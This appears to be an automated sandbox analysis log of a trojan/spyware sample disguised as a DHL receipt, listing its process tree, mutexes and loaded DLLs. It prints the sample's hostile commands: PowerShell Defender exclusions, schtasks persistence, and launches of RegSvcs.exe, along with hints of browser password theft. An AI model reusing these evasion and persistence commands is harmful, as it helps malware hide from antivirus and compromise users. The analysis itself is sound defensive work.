                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: oSJLRdDbLeQ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/16@13/10
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMutant created: \Sessions\1\BaseNamedObjects\QWEkLOfwOWWajh
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD3C2.tmpJump to behavior
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL AWB Receipt_pdf.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EhStorAuthn.exe, 00000012.00000003.2675234053.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2675234053.0000000002DA7000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 50%
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 45%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
